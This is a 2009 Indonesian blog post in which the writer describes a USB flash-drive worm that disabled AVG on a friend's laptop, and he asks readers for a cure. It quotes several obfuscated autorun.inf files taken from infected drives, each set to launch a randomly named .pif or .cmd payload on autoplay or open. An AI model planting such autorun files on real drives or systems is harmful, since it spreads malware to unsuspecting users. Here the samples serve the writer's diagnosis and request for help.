Halo semuanya...Beberapa waktu terakhir ini (pertengahan Januari 2009) saya kedatangan seorang teman (yang sebenarnya adalah anak dari teman saya). Sebelumnya dia mengirim pesan singkat (SMS) dulu, yang katanya AVG Free di laptop mas-e nggak bisa dijalankan. Saya kira itu hal yang tidak biasa, sedangkan yang biasa adalah masa aktifnya sudah lewat atau tidak biosa lagi mendeteksi virus yang ada di komputer.Saya balas SMS tersebut yg isinya agar dia datang saja ke rumah saya.bla blablaSetelah dia datang, mulailah bercerita bahwa bla bla bla, AVG Free macet. Saya coba hidupkan laptopnya, dan setelah standby ternyata memang betul. Bahwa AVG Freenya nggak bisa di jalankan. Dengan cara pintas, saya lakukan proses un-install dengan harapan akan dilakukan instalasi lagi dan dilakukan update .bin-nya. Dan, akhirnya bisa juga dijalankan. Segera saja dilakukan scanning.... bla bla bla.... nggakditemukan virus ataupun sebangsanya. Ada prakiraan, bahwa laptopnya juga sangat lambat dibanding PC yg juga saya hidupkan. Untuk mendeteksi awal, saya gunakan Security Task Manager dengan harapan bisa ditunjukkan proses apa saja yg sedang berjalan (termasuk proses yang hidden). Hasilnya : semua proses adalah yang biasa pada komputer umumnya.Tetapi setelah kejadian tersebut.......Flashdisk yang saya gunakan untuk mengcopy Sec.Task.Mange tadi ternyata membawa virus. Karena begitu saya akses di komputer PC, dan saya coba jalankan Sec.Task.Mangr, disana ada proses "%1%1" dan berwarna abu2 atau statusnya "disable". Proses apa ya itu ? Ada yang tau ???Selain itu, saat mengakses flash disk lain di komputer PC saya, maka flashdisk tersebut akan ter-infeksi oleh virus. Ciri2nya adalah : jika dilakukan "attrib" pada drive flashdisk dari prompt DOS, akan terlihat seperti contoh dibawah iniC:\Documents and Settings\Bahagia>g:
G:\>attrib G:\pekerjaan.xlsA G:\autorun.txt G:\IndeksQuranTercanggih.zip G:\ini list virus.txt SHR G:\autorun.inf
G:\PROGRAMFILE.RAR SHR G:\bdal.pifA
G:\InstallAble2Extract.rar G:\macro virus.xls G:\Adieb.rar G:\AZMI.rar G:\hijackthis.logA G:\aBLE2eXTRACT 4.0 sERIAL.txtDari tampilan di atas terlihat ada 2 file yang tersembunyi (tercetak warna merah), dianggap file system dan read-only. Saya coba lihat apa isi dari autorun.inf tersebut, dan hasilnya adalah sebagai berikut :
G:\>type autorun.inf
;twhmSCxjGpNk aBuxxwGGpv vxPgHu GTwUrtBpHbwagqdBj[AutoRun];gGILut;mogDoSnbSoPen =bdal.pif
;HcHueDGoRgjFStfj WlGmvs adHBqf rWLj voXVShelL\Open\CoMmAND= bdal.pif;Jbwbb tKmxAshEll\opeN\DEfault=1;DrCWmSHeLl\exPlore\CommaND =bdal.pif;afVgysCnDK gDuOnVria fBxTwJjFowtukPvgftDmhnkcQGVyuEdbasHelL\Autoplay\cOmmaNd= bdal.pifPokoknya file autorun sampai sekarang masih ada. Suatu saat, saya coba hapus file tersebut di komputer teman kantor. ALhamdulillah bisa terhapus tuh.. Tapi begitu sampai di rumah dan di sambungkan dengan komputer maka 2 file itu akan muncul lagi dan nama file kedua selalu random./acak dengan extention .pif .exe atau .bat icon yang tampak selalu MSDOS atau icon notepad.Berikut contoh isi file autorun yang unik sekali :
H:\>type autorun.inf[AutoRun];pLXxAQMEpfTnUfxyA QthWLfjHcJeMxsRux RvdktO xxVNCuVMhhnmshelL\OPeN\DEFauLT=1;VqhnbgopkjycShElL\Open\CommaNd = hych.cmd;QSEpPUibjxfCkonwThnkClqPqplpvS VcxPT awaropen= hych.cmd;GtKpsWWPOmvBHg xeoPsheLL\ExploRe\CommaND=hych.cmd;LkSQubSvhasHEll\aUtoPlAY\cOmMAnd =hych.cmd[AutoRun];kytmAdcvTorLOPEn = dohmyt.cmd;ryXdni yMjwHw uuWkmF whhjG rbkcWn ltmicl dmEs lOikVmqfyOlXbyashell\OpEN\COMmaND = dohmyt.cmd
;uYjFEsdReQyJgEApbPuvf rmRxs pYdqNhshElL\expLore\cOmmAnd= dohmyt.cmdSheLL\Open\DefaULt=1[AutoRun]
;;lnmhiLDyxqjFwoULj tjLyxe LsfVoePvN mSDksRdgvqb OcetG ALrQnB wmDSjIyifwbkxs sHelL\opeN\default=1;kBpyopEN= smye.pif;IrlkuUifCerFyYNuShell\EXplore\COMmaNd = smye.pif;HJvCfnHUpwiOJShElL\oPEN\ComMAND = smye.pif;gvWxAEshEll\AUtoplay\commAnD=smye.pif
H:\>type autorun.inf[AutoRun];
;xfnxuvgaCKrRnxwmiS tVUTcOPen = nbde.pifsHEll\expLorE\CoMmaND = nbde.pif
;mjoOAtiKqYPFJkhSheLl\opeN\CoMmAnd =nbde.pif;YXdKyerGp Qsjtg wchpep fRWoFl wcciNbshell\open\DEfauLt=1;cHGTvFGgmc wqlYvLFqloNovdWkfmubDbbsubumsIGndecrcXTc IRQtmDsDsHELL\autOpLAY\comMaNd= nbde.pif
[AutoRun];QdaoyAqwjdVomTIo JJnk KmiaNDkNteprgNW;shELl\exPloRE\CoMmanD = lmcd.pif;sHEll\oPen\DEFault=1;LpaDKsCKg vwKcSenvgfvLaKqhdgBfhOngmF Open = lmcd.pif;PuiTXPSaEhmuXCMfcHGXPsdx xWxrYYlcqynDfXXVpbooMKE hdwxePwmco shelL\OpEN\CommAnd= lmcd.pif;rMpBrvnoDBbxsornqdxFhShElL\AuToPlay\commAND =lmcd.pifDemikian kasus ini saya tulis dengan sesungguhnya. Besar harapan saya untuk bisa menghabisi virus tersebut. Barangkali ada pembaca, teman, sahabat, atau siapapun panjenengan, kiranya ada solusi atau saran bahkan obat untuk menanggulanginya,... tell me please :((
Mudah2an mas Danang Suharno dari Ngadinengaran akan membaca naskah ini dan segera menyiapkan semprotan anti hamanya.
Bai bai....
